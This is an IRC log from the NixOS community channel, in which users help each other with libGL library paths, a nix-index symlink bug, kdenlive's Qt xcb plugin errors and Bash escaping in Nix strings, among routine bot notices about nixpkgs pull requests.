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<borodust> Mic92: hmm, if i understood correctly, makeWrapper would make a executable for me with additional environment stuff, but how would it know where to search for libgl? LD_LIBRARY_PATH contains /run/opengl-drivers/lib/ but there's no libgl there anymore
* borodust uses nixos-unstable
<Mic92> borodust: extend LD_LIBRARY_PATH by using wrapProgram --prepend : ${libGL}/lib ...
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<borodust> ah, i think i'm starting to grasp the idea
<Mic92> borodust: it is prefix rather then prepend
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<infinisil> ,locate libGL.so
<{^_^}> Found in packages: libglvnd, primusLib, libGLU_combined
<infinisil> Why the hell does nix-index not show libGL?!
<iqubic> How hard is it to get GHCJS running on NixOS>
<infinisil> ,locate libGL.so.1.0.0
<{^_^}> Found in packages: libglvnd, libGLU_combined
<infinisil> And mesa_drivers for that matter
<infinisil> Both containing libGL.so
<borodust> infinisil: yup, but i would like to load it dynamically :) thanks anyway
<borodust> i'm trying to wrap my head around wrapProgram
<infinisil> (you probably didn't mean me)
<borodust> it still doesn't feel like i'm going into right direction
<tertle||eltret> is there a list of all non free packages?
<tertle||eltret> or better yet, all packages with non free included/
<borodust> infinisil: err, i thought you were answering libgl qn i shot earlier, sorry
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<samueldr> I'm not updating daily the listing, but uh, often enough; so sometimes version numbers may drift off
<samueldr> (I also had reports of slow load time for the data)
<tertle||eltret> okay, cool, thank you
<{^_^}> [nixpkgs] @dotlambda pushed 3 commits to python-unstable: https://git.io/fN4fn
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<borodust> Mic92: lets say i have a package/app (`sbcl` to be precise) and i want it to know where to find certain libraries to load them dynamically via dlopen (libgl being one of them) inside it (from within a process, resolving paths to libraries at runtime), where should i RTFM to understand what should i do
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<LnL> infinisil: interesting!
<LnL> infinisil: curl cache.nixos.org/v8iqw8s010by68c7nkdairffpgaxbiq6.ls | brotli -d
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<infinisil> {"version":1,"root":{"type":"symlink","target":"/nix/store/jxj6i2902890bxy207dv1qmnvlysdpvr-libglvnd-1.0.0"}}
<LnL> the libGL store path is a symlink and hydra's file listing doesn't seem to resolve that
<infinisil> Ohh
<infinisil> Well that sucks
<infinisil> nix-index just become so much less useful
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<LnL> ^ write-nar-listing=1 is what enables the generation of those files
<LnL> open an issue?
<tertle||eltret> if i install a game in a nix-shell, can i still run it on the base X11?
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<LnL> nix-index could be smart and resolve the next path
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<LnL> the response hash all the information it needs for that (jxj6i2902890bxy207dv1qmnvlysdpvr)
<LnL> has*
<infinisil> Ah right
<infinisil> I just looked up the source code for the nar json dump, but you're right it does indeed propagate all necessary info
<tenten8401> samueldr: I was scrolling up and noticed you asked if I fixed kdenlive yet
<tenten8401> I haven't unfortunately, still getting the same error
<infinisil> LnL: (It's in nix's source code, src/libstore/nar-accessor.cc function listNar if you're interested)
<samueldr> ooh, tenten8401 :3 wanna try something?
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<LnL> infinisil: after substituting I also get a symlink not copied contents, so the nar dump is correct
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<infinisil> LnL: And nix-index even gets the symlinks: https://github.com/bennofs/nix-index/blob/ecd2b40e/src/hydra.rs#L542-L547
<samueldr> tenten8401: using `nix-shell --run "kdenlive"` while cd-ed into a directory having this default.nix (only) https://gist.github.com/f3edd474b7496babfdbb74df85ae7645
<LnL> infinisil: hmm, are you running 0.1.1?
<infinisil> Yea
<tenten8401> samueldr: sure, give me a sec
<infinisil> I guess it just doesn't put it into the index further than that
<LnL> n/m that didn't change
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<tenten8401> samueldr: didn't fix it unfortunately
<samueldr> still exactly the same issue?
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<Mic92> borodust: it is probably also somewhere in the documentation, but this example should be good enough: https://github.com/NixOS/nixpkgs/blob/master/pkgs/development/web/postman/default.nix#L86
<tenten8401> exact same issue
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<samueldr> and refresh me, it's qt not being able to find the platform plugin "xcb", right?
<tenten8401> yup
<samueldr> tenten8401: can you try the alternative fix?
<{^_^}> [nixpkgs] @ktf opened pull request #44034 → doing: init at 1.0.10pre → https://git.io/fN4Jz
<tenten8401> This application failed to start because it could not find or load the Qt platform plugin "xcb" in "". Reinstalling the application may fix this problem.
<tenten8401> sure
<samueldr> comment out the shellhook, and uncomment the line with QT_PLUGIN_PATH
<LnL> infinisil: hmm, for some orther packages it seems to resolve that correctly, eg. wineStaging points to the store path of libGLU_combined
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<tenten8401> samueldr: same error with the QT_PLUGIN_PATH uncommented
<samueldr> weird though, the "PATH=" fix should work, unless I missed something with unstable :/
<infinisil> LnL: Oh actually I know it resolved libGL correctly in an earlier version
<samueldr> and uh, that should definitely work, get into the nix-shell (without run) and tell me the value of $QT_PLUGIN_PATH please, thanks
<borodust> Mic92: thanks! I'll check it out
<infinisil> LnL: I had it in my cache before I updated it
<samueldr> (I'll try realising the path and understand the issue better)
<tenten8401> [nix-shell:~/kdenlive]$ echo $QT_PLUGIN_PATH
<tenten8401> /nix/store/r3a0cky3iv24i6x3w9if3l3zgkd0k8cz-qtbase-5.11.1-bin/lib/qt-5.11/plugins
<samueldr> thanks
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<infinisil> LnL: Bisection would probably reveal the problem
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<Mic92> samueldr: when nix-shell did start setting QT_PLUGIN_PATH ?
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<samueldr> Mic92: it didn't it's part of the nix expression
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<samueldr> (it was to test assumptions)
<infinisil> LnL: libGL.so is also a symlink in libGLU_combined..
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<LnL> yeah, I think it's only if the store path itself is a symlink that causes the problem
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<infinisil> LnL: Oh.. Yeah that makes sense
<samueldr> weird :/ when explicitely going with nixos-unstable (instead of <nixpkgs>), it works perfectly fine here (on a 18.03 system)
<samueldr> I mean, even using --pure, where libGL doesn't load (expectedly) but it goes past libxcb issues
<LnL> infinisil: maybe it only recurses if it's a directory, since you can't recurse files :)
<samueldr> tenten8401: could you give me the output (kdenlive.strace) of `strace -fo kdenlive.strace kdenlive`, when it fails to load xcb?
<tenten8401> inside of nix-shell?
<infinisil> LnL: But the symlink has to be to a file, because it is a file
<infinisil> LnL: The problem seems to be with absolute vs relative symlink
<samueldr> tenten8401: both if you can :)
<infinisil> s
<tenten8401> samueldr: Inside of Nix-Shell: https://hastebin.com/wimufadodo.m
<{^_^}> bennofs/nix-index#23 (by Infinisil, open): Relative symlinks don't work
<samueldr> (I think I may have a global fix for QT and plugins, writing it up is a bit hard, but either tonight [for me] or tomorrow a PR will be made with an attempt)
<samueldr> thanks tenten8401
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<samueldr> ah, tenten8401 the contents of the file `kdenlive.strace` :)
<tenten8401> my bad, lol
<infinisil> LnL: Am going to bed now though, thanks for the help with this :)
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<samueldr> tenten8401: only when it fails to load xcb platform plugins though
<tenten8401> eek, 49.3 MB
<samueldr> so uh, forget about that one I think
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<tenten8401> should I just grep it for xcb and upload?
<samueldr> unless... is it *kdenlive* that fails, or when you render?
<tenten8401> kdenlive isn't failing when I render, it's the backend I think
<tenten8401> one sec
<samueldr> ah! I thought kdenlive directly failed to start!
<tenten8401> nope
<tenten8401> it's the rendering that fails to start
<tenten8401> the application is fine
<samueldr> now it makes more sense, let me try to repro
<tenten8401> you don't have to put anything in the timeline for it to fail
<tenten8401> should just fail anyways
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<tenten8401> If I had to guess, this is where it's having issues: https://hastebin.com/uwimumuwob.pl
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<tenten8401> also looks like it can't find libXau, libXdmcp, libXext, libX11, and some others
<samueldr> hmmm so it seems it loads the libxcb platform plugin, but *that* plugin has trouble loading libxcb, weird
<Enzime> can someone get GrahamcofBorg to build my PR?
<{^_^}> #43612 (by Enzime, open): mpv: build and install macOS App Bundle
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<tenten8401> do you want me to upload the 50MB strace?
<tenten8401> would it help at all?
<samueldr> tenten8401: not yet
<samueldr> (wouldn't really help)
<samueldr> hm, maybe I'm using kdenlive wrong, I don't see any webm output?
<bkchr[m]> worldofpeace: I got plasma working on wayland! :D
<tenten8401> uhg, so I tried installing racer for rust autocompletion... apparetly it's some weird game that screws up my screen resolution
<tenten8401> samueldr: it should be the first one in the format list, but it doesn't matter what you select
<tenten8401> I was selecting WebM-VP9 and HEVC
<tenten8401> perhaps it's because I've got ffmpeg-full installed
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<{^_^}> Channel nixos-18.03-small advanced to https://github.com/NixOS/nixpkgs/commit/3cf06212b00 (from 2 hours ago, history: https://channels.nix.gsc.io/nixos-18.03-small)
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<tenten8401> when's nixos-unstable going to advance :(
<tenten8401> the label turned red today on howoldis, small channel is about to as well
<bkchr[m]> tenten8401: nixos master is broken at the moment, that needs to be fixed before
<{^_^}> [nixpkgs] @dotlambda pushed to python-unstable « python: testresources: 0.2.7 -> 2.0.1 »: https://git.io/fN4Tu
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<tenten8401> yeah, guess I was more of just expressing my sadness than asking what was wrong since I've been waiting on a package to land, but I mean it is called unstable for a reason
<tenten8401> I'm greatful it does get tested in advance (at least to an extent) before getting sent out though
<samueldr> :/ on 18.03 I cannot start kdenlive from unstable-18.09pre146471.d7d31fea7e7 (some of my previous tests may have been wrong)
<tenten8401> speaking of the master branch, would it be possible to get #42871 merged in sometime soon? I tested it out on a server of mine running 18.03 and it seems to work flawlessly.
<{^_^}> https://github.com/NixOS/nixpkgs/pull/42871 (by Ma27, open): ocserv: init at 0.12.1
<tenten8401> samueldr: can't start it at all or can't start rendering?
<tenten8401> rendering is screwed up right now on unstable I believe
<samueldr> at all, hangs on a futex call...
<tenten8401> odd
<samueldr> (through a nix-shell with --pure also)
<samueldr> anyway, meanwhile I was able to reproduce one of the issues I wasn't able to reproduce before :)
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<Myrl-saki> Err
<Myrl-saki> How do I use the Bash ${} inside scripts?
<samueldr> with care :)
<samueldr> depending on the type of string (" or '')
<samueldr> ,escape"
<{^_^}> " double quote: \" backslash: \\ bash curly bois: \${} newline: \n tab: \t "
<samueldr> ,escape''
<{^_^}> '' two single quotes: ''' bash curly bois: ''${} newline: ''\n tab: ''\t any character x: ''\x ''
<Myrl-saki> Thanksies.
<samueldr> though, I have to say that if you are using them into '', you may want to instead ${ "\${bash_fancyness}" }
<Myrl-saki> That's actually what I was thinking too. :P
<samueldr> infinitely more readable than using ''${} if you need to then wrap it into 'single-quoted string'
<Myrl-saki> Thanks. I'll do that instead.
<Myrl-saki> It also plays better with syntax highlighting too, in a sense.
<Myrl-saki> '' looks like it's part of the actual script.
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<Myrl-saki> While having the ${} there makes it look "why am i doign this"
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<{^_^}> [nixpkgs] @jb55 opened pull request #44036 → python: init ephemeral_port_reserve at v1.1.0 → https://git.io/fN4I8
<{^_^}> [nixpkgs] @basvandijk merged pull request #43959 → haskellPackages.doctest-discover: Disable tests → https://git.io/fNlJV
<{^_^}> [nixpkgs] @basvandijk pushed 2 commits to master: https://git.io/fN4I4
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<tenten8401> Anyone know if there's a riot-web actual desktop client available in NixOS?
<tenten8401> from the looks of it, it just looks like it's made for webserver use
<{^_^}> [nixpkgs] @flokli opened pull request #44037 → networkmanager: fix VPN activation through nm-applet → https://git.io/fN4Iw
<tenten8401> which I mean, is fine and all
<tenten8401> but I like my desktop clients
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<{^_^}> [nixpkgs] @basvandijk pushed to master « doctest-discover: move override out of configuration-nix.nix »: https://git.io/fN4L1
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ericsagnes has quit [Ping timeout: 256 seconds]
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<IsaacA[m]> samueldr: Just so you're aware, it's tenten8401 here, I think I might try using the Matrix -> IRC bridge from now on, and maybe use the IsaacA username instead.